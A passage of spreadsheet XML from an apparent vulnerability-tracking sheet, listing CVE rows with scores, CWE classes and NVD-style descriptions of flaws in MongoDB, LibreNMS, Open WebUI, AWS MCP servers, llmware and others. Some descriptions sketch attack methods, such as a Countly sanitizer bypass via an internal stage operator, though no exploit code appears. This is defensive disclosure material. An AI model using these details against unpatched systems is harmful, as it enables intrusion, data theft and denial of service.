          <t>The $regexFindAll expression can be used by an authenticated user who can run aggregation pipeline stages to crash a MongoDB server (mongod). Under certain specific conditions the  regex match can start in the middle of a multi-code-unit character, triggering an assertion during query execution.</t>
        </is>
      </c>
      <c r="M1249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="C1250" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1250" s="5" t="inlineStr"/>
      <c r="F1250" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1250" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1250" s="5" t="inlineStr"/>
      <c r="I1250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1250" s="5" t="inlineStr"/>
      <c r="K1250" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1250" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB server's JSON Pointer parser used during $jsonSchema query filter processing. When a find command includes a specially crafted $jsonSchema filter field, the parser processes the input without enforcing adequate limits on iteration count or total allocation size, resulting in significant memory amplification. Under concurrent request load, the cumulative memory consumption can exhaust available heap memory, causing the server's out-of-memory handler to terminate the mongod process and deny service to all connected clients.</t>
        </is>
      </c>
      <c r="M1250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="C1251" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1251" s="5" t="inlineStr"/>
      <c r="F1251" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1251" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1251" s="5" t="inlineStr"/>
      <c r="I1251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1251" s="5" t="inlineStr"/>
      <c r="K1251" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1251" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's 2dsphere index key generation that can cause a server crash due to a null pointer dereference. When a specially crafted GeoJSON document is inserted into a collection with a 2dsphere index, an inconsistency in geometry parsing can leave an internal object in an invalid, partially initialized state. During subsequent index key generation, access to this improperly initialized object results in a null pointer dereference that terminates the mongod process. An authenticated user with write access can use this to cause a denial of service.</t>
        </is>
      </c>
      <c r="M1251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="C1252" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1252" s="5" t="inlineStr"/>
      <c r="F1252" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1252" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1252" s="5" t="inlineStr"/>
      <c r="I1252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1252" s="5" t="inlineStr"/>
      <c r="K1252" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1252" s="5" t="inlineStr">
        <is>
          <t>A security issue was discovered in MongoDB where an authenticated user with readWrite privileges could crash the mongod server process. By specifying a custom WiredTiger storage configuration option with an incompatible value during collection creation, a user could cause a type confusion in the storage engine layer. When documents were subsequently read from the misconfigured collection, the resulting mismatch in expected data format led to corrupted memory interpretation and a server crash. The crafted collection configuration persists across restarts, requiring manual operator intervention to remediate.</t>
        </is>
      </c>
      <c r="M1252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="C1253" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1253" s="5" t="inlineStr"/>
      <c r="F1253" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1253" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1253" s="5" t="inlineStr"/>
      <c r="I1253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1253" s="5" t="inlineStr"/>
      <c r="K1253" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1253" s="5" t="inlineStr">
        <is>
          <t>A flaw in MongoDB's JSON Schema validation error generation code allows an authenticated user with readWrite privileges to crash the mongod server. When a BSON document containing an array with a malformed numeric field name fails a $jsonSchema items type constraint, the error generation path performs unsafe numeric conversion on the user-controlled field name without proper exception handling, resulting in an uncaught exception that terminates the server process. This is possible because incoming wire protocol BSON validation does not enforce that array element field names are valid, in-range numeric indices.</t>
        </is>
      </c>
      <c r="M1253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="C1254" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1254" s="5" t="inlineStr"/>
      <c r="F1254" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1254" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1254" s="5" t="inlineStr"/>
      <c r="I1254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1254" s="5" t="inlineStr"/>
      <c r="K1254" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1254" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server's storage engine integration layer allows an authenticated user with collection creation privileges to cause a persistent denial of service. Insufficient validation of user-supplied storage configuration options permits values that, once persisted to durable metadata, trigger a fatal assertion failure when the metadata is subsequently read by diagnostic operations. The corrupted metadata persists across server restarts and is replicated to other cluster members, requiring manual operator intervention to restore service.</t>
        </is>
      </c>
      <c r="M1254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="C1255" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1255" s="5" t="inlineStr"/>
      <c r="F1255" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1255" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1255" s="5" t="inlineStr"/>
      <c r="I1255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1255" s="5" t="inlineStr"/>
      <c r="K1255" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1255" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with write privileges to trigger a persistent fatal assertion crash by sending specially crafted retryable write commands. The crash state is durably persisted, causing the server process to repeatedly crash on restart and potentially propagating to additional nodes in a sharded cluster. Manual intervention is required to restore service availability.</t>
        </is>
      </c>
      <c r="M1255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="C1256" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1256" s="5" t="inlineStr"/>
      <c r="F1256" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1256" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1256" s="5" t="inlineStr"/>
      <c r="I1256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1256" s="5" t="inlineStr"/>
      <c r="K1256" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1256" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's diagnostic reporting interface allows an authenticated user with monitoring privileges to access insufficiently protected credentials from concurrent administrative operations. The same credentials are properly redacted in server log output, but the diagnostic interface omits equivalent redaction. Successful exploitation requires a valid authenticated session with monitoring-level permissions and results in exposure of cleartext credentials that could enable impersonation of other users, including privileged accounts.</t>
        </is>
      </c>
      <c r="M1256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="C1257" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1257" s="5" t="inlineStr"/>
      <c r="F1257" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1257" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1257" s="5" t="inlineStr"/>
      <c r="I1257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1257" s="5" t="inlineStr"/>
      <c r="K1257" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1257" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server aggregation framework allows an authenticated user with limited read privileges to bypass view-level authorization checks and access data from unauthorized collections when Atlas Search features are in use. The issue stems from insufficient validation of an internal command parameter that can be set by external clients, causing a security check to be improperly skipped.</t>
        </is>
      </c>
      <c r="M1257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="C1258" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1258" s="5" t="inlineStr"/>
      <c r="F1258" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1258" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1258" s="5" t="inlineStr"/>
      <c r="I1258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1258" s="5" t="inlineStr"/>
      <c r="K1258" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1258" s="5" t="inlineStr">
        <is>
          <t>MongoDB Server contains an incorrect authorization vulnerability in the aggregation framework. An authenticated user with minimal privileges can craft a specially formatted aggregation request that causes the server's authorization subsystem to evaluate a different operation than what is actually executed, resulting in unauthorized read access to collection data within the target database.</t>
        </is>
      </c>
      <c r="M1258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="C1259" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1259" s="5" t="inlineStr"/>
      <c r="F1259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1259" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1259" s="5" t="inlineStr"/>
      <c r="I1259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1259" s="5" t="inlineStr"/>
      <c r="K1259" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1259" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82864</t>
        </is>
      </c>
      <c r="C1260" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1260" s="5" t="inlineStr"/>
      <c r="F1260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1260" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1260" s="5" t="inlineStr"/>
      <c r="I1260" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1260" s="5" t="inlineStr"/>
      <c r="K1260" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L1260" s="5" t="inlineStr">
        <is>
          <t>pdfme pdf-lib versions before 5.5.10 contain an unbounded buffer growth vulnerability in the DecodeStream.ensureBuffer() method that allows attackers to cause denial of service by supplying a crafted PDF with a FlateDecode stream containing a decompression bomb. Attackers can upload a small compressed PDF that decompresses to hundreds of megabytes, exhausting memory and crashing the Node.js process or freezing browser tabs during PDF parsing.</t>
        </is>
      </c>
      <c r="M1260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82864</t>
        </is>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84192</t>
        </is>
      </c>
      <c r="C1261" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1261" s="5" t="inlineStr"/>
      <c r="F1261" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1261" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1261" s="5" t="inlineStr"/>
      <c r="I1261" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1261" s="5" t="inlineStr"/>
      <c r="K1261" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1261" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.3.1 contains a stored cross-site scripting vulnerability in legacy PHP templates that output SNMP-sourced and syslog-sourced data without escaping. An attacker who controls a monitored network device can inject arbitrary JavaScript through SNMP interface descriptions or syslog program fields that executes when authenticated users view affected pages.</t>
        </is>
      </c>
      <c r="M1261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84192</t>
        </is>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85390</t>
        </is>
      </c>
      <c r="C1262" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1262" s="5" t="inlineStr"/>
      <c r="F1262" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1262" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1262" s="5" t="inlineStr"/>
      <c r="I1262" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1262" s="5" t="inlineStr"/>
      <c r="K1262" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1262" s="5" t="inlineStr">
        <is>
          <t>Checkmate through 3.11.0 omits the isAllowed role guard middleware on maintenance-window, notification, and check-deletion routes, allowing read-only users to perform administrative actions. Attackers with user-role sessions can create arbitrary maintenance windows to silence alerts, modify notification channels, and delete monitor check history to erase incident evidence.</t>
        </is>
      </c>
      <c r="M1262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85390</t>
        </is>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85654</t>
        </is>
      </c>
      <c r="C1263" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1263" s="5" t="inlineStr"/>
      <c r="F1263" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1263" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1263" s="5" t="inlineStr"/>
      <c r="I1263" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1263" s="5" t="inlineStr"/>
      <c r="K1263" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L1263" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a template engine in the CDK generator in Amazon awslabs.dynamodb-mcp-server before 2.1.6 might allow a context-dependent actor to execute arbitrary code on the host that deploys the generated application via crafted table, index, or attribute names in a data model file.</t>
        </is>
      </c>
      <c r="M1263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85654</t>
        </is>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85689</t>
        </is>
      </c>
      <c r="C1264" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1264" s="5" t="inlineStr"/>
      <c r="F1264" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1264" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1264" s="5" t="inlineStr"/>
      <c r="I1264" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1264" s="5" t="inlineStr"/>
      <c r="K1264" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1264" s="5" t="inlineStr">
        <is>
          <t>llmware 0.4.6 contains an SQL injection vulnerability in the collection-database layer (llmware/resources.py) where filter and lookup values are directly string-interpolated into SQL WHERE clauses without parameterization or escaping, in both the SQLite and PostgreSQL backends. The filter validator only checks keys against an allow-list and never sanitizes values. Attacker-controlled filter values reaching the public API via Library.block_lookup and Query.text_query_with_custom_filter / text_query_by_author_or_speaker can neutralize the intended filter to disclose rows the caller was scoped out of (cross-document/cross-collection disclosure); on PostgreSQL the flaw permits boolean- and UNION-based SQL injection.</t>
        </is>
      </c>
      <c r="M1264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85689</t>
        </is>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85787</t>
        </is>
      </c>
      <c r="C1265" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1265" s="5" t="inlineStr"/>
      <c r="F1265" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1265" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1265" s="5" t="inlineStr"/>
      <c r="I1265" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1265" s="5" t="inlineStr"/>
      <c r="K1265" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1265" s="5" t="inlineStr">
        <is>
          <t>An incomplete list of disallowed inputs in the SQL validation component in Amazon awslabs postgres-mcp-server before  version 1.1.7 might allow an unauthenticated actor to modify data beyond the read-only scope by placing crafted SQL into the content that is submitted when an authenticated user interacts with the MCP server.
To remediate this issue, users should upgrade to version 1.1.7 or above.</t>
        </is>
      </c>
      <c r="M1265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85787</t>
        </is>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87803</t>
        </is>
      </c>
      <c r="C1266" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1266" s="5" t="inlineStr"/>
      <c r="F1266" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1266" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1266" s="5" t="inlineStr"/>
      <c r="I1266" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1266" s="5" t="inlineStr"/>
      <c r="K1266" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1266" s="5" t="inlineStr">
        <is>
          <t>An authorization bypass vulnerability exists in the Countly Server DBViewer due to flawed sub-pipeline detection in the aggregation stage sanitizer. The /o/db aggregation endpoint parses user-controlled aggregation JSON and passes it through a stage sanitizer that determines whether a nested array is a sub-pipeline by checking if every element contains a key present in a hardcoded KNOWN_STAGE_OPERATORS set. If any element contains an unrecognized stage key, such as the undocumented MongoDB-internal $_internalInhibitOptimization, the sanitizer misclassifies the entire branch as a generic array and skips stage-level stripping for all sibling stages. This allows a non-admin user with DBViewer read permission to inject forbidden operators like $lookup inside $facet sub-pipelines, performing cross-collection joins into restricted collections. This leads to unauthorized read access to sensitive data including password-reset tokens (prid), enabling account takeover.</t>
        </is>
      </c>
      <c r="M1266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87803</t>
        </is>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="C1267" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1267" s="5" t="inlineStr"/>
      <c r="F1267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1267" s="5" t="inlineStr">
        <is>
          <t>oracle, python</t>
        </is>
      </c>
      <c r="H1267" s="5" t="inlineStr"/>
      <c r="I1267" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1267" s="5" t="inlineStr"/>
      <c r="K1267" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1267"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M1267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87999</t>
        </is>
      </c>
      <c r="C1268" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1268" s="5" t="inlineStr"/>
      <c r="F1268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1268" s="5" t="inlineStr">
        <is>
          <t>python, azure</t>
        </is>
      </c>
      <c r="H1268" s="5" t="inlineStr"/>
      <c r="I1268" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1268" s="5" t="inlineStr"/>
      <c r="K1268" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1268" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. Prior to 0.11.1, POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/web/search in backend/open_webui/retrieval/web/utils.py treated Python's globally routable address classification as proof that a destination was external. An authenticated user could make an Azure-hosted instance fetch and return content from 168.63.129.16, the Azure platform channel, as well as other reserved ranges that the standard classification did not reject. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M1268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87999</t>
        </is>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88026</t>
        </is>
      </c>
      <c r="C1269" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1269" s="5" t="inlineStr"/>
      <c r="F1269" s="5" t="inlineStr"/>
      <c r="G1269" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1269" s="5" t="inlineStr"/>
      <c r="I1269" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1269" s="5" t="inlineStr"/>
      <c r="K1269" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1269" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of regular-expression metacharacters in the LINQ query translation component of the MongoDB C# Driver can cause a caller-supplied character sequence to alter a regular-expression predicate generated by an affected application. An authenticated user who can influence such a value may cause the application to return records beyond those intended by the original filter.</t>
        </is>
      </c>
      <c r="M1269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88026</t>
        </is>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88027</t>
        </is>
      </c>
      <c r="C1270" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1270" s="5" t="inlineStr"/>
      <c r="F1270" s="5" t="inlineStr"/>
      <c r="G1270" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1270" s="5" t="inlineStr"/>
      <c r="I1270" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1270" s="5" t="inlineStr"/>
      <c r="K1270" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1270" s="5" t="inlineStr">
